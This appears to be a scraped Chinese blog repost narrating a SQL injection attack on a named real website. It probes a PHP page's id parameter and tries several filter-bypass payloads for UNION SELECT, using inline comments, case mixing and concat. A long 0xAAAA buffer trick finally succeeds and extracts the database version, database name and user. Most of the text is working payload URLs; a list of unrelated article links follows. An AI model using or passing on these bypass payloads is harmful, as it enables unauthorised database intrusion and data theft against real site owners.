PHP过滤union select如何办
来源:互联网 发布:怎么做游戏程序员 编辑:程序博客网 时间:2024/04/30 05:48
//*ps 此点目前流行的注射工具射不 *//
http://cleopatra-sy.com/index.php?content=more_product&id=17
http://cleopatra-sy.com/index.php?content=more_product&id=17 and 1=1 正常
http://cleopatra-sy.com/index.php?content=more_product&id=17 and 1=2 报错
http://cleopatra-sy.com/index.php?content=more_product&id=17 order by 6 正常
http://cleopatra-sy.com/index.php?content=more_product&id=17 order by 7 错误
继续按照常规的手法注射:
http://cleopatra-sy.com/index.php?content=more_product&id=-17+UNION+SELECT+1,2,
3,4,5,6--
错误nnd,过滤 UNION+SELECT 我们来加点特殊的字符看看能不能绕过
http://cleopatra-sy.com/index.php?content=more_product&id=-17+/**//**//*!uNiOn*//**/
/**//*!sElEcT*//**//**/1,2,3,4,5,6--
悲剧还是绕不过去 - -,于是尝试自己知道的绕过方法继续射…
http://cleopatra-sy.com/index.php?content=more_product&id=-17+/*U*//*n*//*i*//*o*//*n
*//*t*/+/*s*//*e*//*l*//*e*//*c*//*t*/+1,2,3,4,5,6--
http://cleopatra-sy.com/index.php?content=more_product&id=-17+concat(u,n,i,o,n)+conca
t(s,e,l,e,c,t)+all+1,2,3,4,5,6--
悲剧还是绕不过去,nnd。找了几个朋友看了还是绕不过去邪恶的过滤啊。要是国内
的站以上几种方法一般都能搞定,老外就是bt。最后实在木有办法了只好去国外的黑
客论坛求助老外帮助。国外php 注射历史悠久手法独特+方法猥琐 射出几率相当高
于是发帖求助了终于有一个黑客回帖了而且轻松的绕过去了。
http://cleopatra-sy.com/index.php?content=more_product&id=-17 and (select 1)=(select
0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA)+/*!union*/+select+1,2,3,4,5,6--+-
靠,老外果然牛B 那么继续射
http://cleopatra-sy.com/index.php?content=more_product&id=-17 and (select 1)=(select
0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA)+/*!union*/+select+1,concat_ws(0x7c,version(),database(),u
ser()),3,4,5,6--+-
成功得到系统版本、当前数据库用户、用户名
- PHP过滤union select如何办
- sql注入绕过union select过滤
- 【转】突破sql 注入过滤Union+SELECT 继续射下去
- 突破sql 注入过滤Union+SELECT 继续射下去
- 变态方法突破过滤UNION+SELECT继续注入
- 突破sql 注入过滤Union+SELECT 继续射下去
- sql server 的T-SQL 学习笔记(二)--- 解决union select插入多行数据过滤数据(union all)
- 找不到Uicode如何办?
- 空虚如何办
- PHP如何过滤★等特殊符号
- select 中的union 和union all用法
- select 中的union 和union all用法
- EasyUS(union select) V1.0
- SQL SELECT UNION的应用
- select.union all .where.解决方案
- 过滤select列表
- php过滤
- PHP中如何过滤掉非汉字字符?
- mkdir javac jar clean 不同情况执行构建文件的输出情况
- linux驱动基础开发3——linux 内核配置机制(make menuconfig、Kconfig、makefile)讲解
- java.lang.NoSuchMethodException: 解决办法
- Tomcat:Tomcat使用WAR包部署
- SSAS中命名集(SET)的使用
- PHP过滤union select如何办
- DOS命令之Date命令的用法
- 代码的坏味道(来自《重构-改善既有代码的设计》)
- 谈谈对IT学习的态度
- android2.2播放视频占用资源问题
- linux子系统的初始化_subsys_initcall():那些入口函数
- 卸载IIS的时候,在Windows组件里面找不到Internet信息服务(IIS)
- 分词算法介绍
- oracle 10g 关于主键延迟